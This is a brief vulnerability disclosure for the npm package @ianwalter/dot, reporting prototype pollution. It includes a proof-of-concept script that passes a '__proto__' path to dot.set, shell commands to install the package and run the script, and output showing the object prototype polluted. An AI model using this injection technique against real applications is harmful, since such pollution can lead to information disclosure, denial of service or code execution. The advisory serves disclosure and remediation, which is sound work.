@ianwalter/dot
is vulnerable to Prototype Pollution
.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
// poc.js
var dot = require("@ianwalter/dot")
var obj = {}
console.log("Before : " + {}.polluted);
dot.set(obj, '__proto__.polluted', 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
npm i @ianwalter/dot # Install affected module
node poc.js # Run the PoC
Before : undefined
After : Yes! Its Polluted